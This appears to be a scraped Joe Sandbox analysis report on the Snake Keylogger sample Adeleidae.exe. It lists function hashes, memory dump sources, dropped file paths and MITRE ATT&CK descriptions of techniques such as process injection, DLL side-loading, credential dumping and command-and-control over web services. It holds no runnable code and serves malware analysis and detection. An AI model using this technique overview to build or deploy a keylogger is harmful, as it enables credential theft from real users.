Instruction ID: 1f51946d43e21baacc31b17bd1bc721070c53078b14bf44f3d98fa973119c335
Opcode Fuzzy Hash: 5e05e89bd81a0ca62564c9e11992b8fbed815744db41ca37b179990c8b36ab48
Instruction Fuzzy Hash: 1AC1AF74E01218CFDB15DFA5C984B9DBBB2BF89304F2081AAD409AB365DB359E85CF11

Function 27EF6A18 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3027249528.0000000027EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 27EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_27ef0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb31c24a69853b497c4a3d4e598d51e7fcee6c6290186a48ba8cac6e26324ca8
Instruction ID: 6475ac152c690300b97de8e8c3bc596fa073ae123ad51028d34069b195f7f1aa
Opcode Fuzzy Hash: fb31c24a69853b497c4a3d4e598d51e7fcee6c6290186a48ba8cac6e26324ca8
Instruction Fuzzy Hash: F2C1BE74E01218CFDB15DFA5C984B9DBBB2BF89304F2081AAD408AB365DB359E85CF51

Function 02A8F2C0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e2d308ad4578dc30db351be008f94deb0b1ec0b7529309605edd665475ee1fa
Instruction ID: 82cfe0f90e303bfe242f4165477948ea4046290562eb456cd7047691a37f8dca
Opcode Fuzzy Hash: 5e2d308ad4578dc30db351be008f94deb0b1ec0b7529309605edd665475ee1fa
Instruction Fuzzy Hash: D7514370D41209CFDB04EFA9E584BEDBBB2FB89310F649169D404BB298DB799881CF54

Function 02A8F4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f1223863a452273b4b503dd3858fc6e82ddc5fe7d44af7631b43024a0ded8ea
Instruction ID: 4fc494a94323125f6df77e3fdfb7aaf486823636815880a1acdb851687c75537
Opcode Fuzzy Hash: 4f1223863a452273b4b503dd3858fc6e82ddc5fe7d44af7631b43024a0ded8ea
Instruction Fuzzy Hash: FE512370D41209CFDB14EFA8E584BADBBB2FB49314FA0956AD015FB684DB399881CF50

Function 27EFB081 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3027249528.0000000027EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 27EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_27ef0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c1fa4c699712c43465c935040ed4d1b4c241b215d130229ea4032367019ab62
Instruction ID: 09e177b52bc370cb05ff084f9bb115a23b20543bb0da3cad06ecb062b18345d1
Opcode Fuzzy Hash: 4c1fa4c699712c43465c935040ed4d1b4c241b215d130229ea4032367019ab62
Instruction Fuzzy Hash: AC41EF74D022199FCB04DFA4D594BEEBBF2AB49304F1490A9E414BB391D7389A40CFA6

Function 27EFB1C0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3027249528.0000000027EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 27EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_27ef0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 682337205b124c2d3d43fa6343bbe9af55452e4b267f9443049b529be84e80b4
Instruction ID: b65f30323d983a261ef9be411c493826dfdd7d7d59a4b6deae7bf7c9329c4b4f
Opcode Fuzzy Hash: 682337205b124c2d3d43fa6343bbe9af55452e4b267f9443049b529be84e80b4
Instruction Fuzzy Hash: 3B3114B5D00219CFDB10DFA9D844BAEFBF1BB49314F208559D859A7350C738A940CFA9

Function 02A87700 Relevance: 10.5, Strings: 8, Instructions: 451COMMON

Download Yara Rule

Strings

,bq, xrefs: 02A87BA0
(o^q, xrefs: 02A8772E
(o^q, xrefs: 02A87815
(o^q, xrefs: 02A87BFF
(o^q, xrefs: 02A87C0F
,bq, xrefs: 02A87B90
(o^q, xrefs: 02A877E9
(o^q, xrefs: 02A878B2

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: 01ad3098f68c5ea6702528417c1d1e64b25eaa413aebe7d6d26c0bc36847ea5a
Instruction ID: c160986350d143bf031881c9bfb7c37db36b0d44fcda0d7f4da96dbda21ac78b
Opcode Fuzzy Hash: 01ad3098f68c5ea6702528417c1d1e64b25eaa413aebe7d6d26c0bc36847ea5a
Instruction Fuzzy Hash: A4124934A00209CFCB14EF69C984AAEFBF2FF48314F248559E55A9B261DB30ED45CB50

Function 02A876F1 Relevance: 5.3, Strings: 4, Instructions: 273COMMON

Download Yara Rule

Strings

(o^q, xrefs: 02A8772E
(o^q, xrefs: 02A87815
(o^q, xrefs: 02A877E9
(o^q, xrefs: 02A878B2

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q
API String ID: 0-1978863864
Opcode ID: 4d921bb08c0b8b3432da5119bb3349a79fd42c5247063de1bbe4cbca3a68159e
Instruction ID: fa302a5f175eb861d32ee4d5e023530f912871d694352e54f27cee39284b7aaa
Opcode Fuzzy Hash: 4d921bb08c0b8b3432da5119bb3349a79fd42c5247063de1bbe4cbca3a68159e
Instruction Fuzzy Hash: FAC12974A002099FCB14DF69C9C4AAEFBF2FF48314F258559E859AB261DB30ED41CB50

Function 02A86920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 02A86952
\;^q, xrefs: 02A8692C
\;^q, xrefs: 02A8695E
\;^q, xrefs: 02A86936

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: a2cb2cb3f94782b3ce9ee107afb810be5ea6526d8dbd0c69788bc70fab6b07da
Instruction ID: a383c0bef7ca6575ab9034bc964a9ab91046c92424ed2b586322fbca044e357c
Opcode Fuzzy Hash: a2cb2cb3f94782b3ce9ee107afb810be5ea6526d8dbd0c69788bc70fab6b07da
Instruction Fuzzy Hash: 7F019A31B401048FAB28AF2CC584A2673EEAB88E60725446AE446CB3F4DE21DC418780

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Adeleidae.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Damascenere.lnk

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zborzuz.44l.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ehu4lz3.5go.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgwboprl.ygv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xi30enhu.mgu.ps1

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe:Zone.Identifier

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Fornuftens.Ano

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\bekrigelsers.tai

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\campagnol.txt

Windows Analysis Report
Adeleidae.exe

Function 004032A0 Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 401
stringfilecomCOMMON

Function 00404B30 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Function 00406077 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207
stringCOMMON

Function 00405846 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00403C41 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Function 0040389E Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402DEE Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre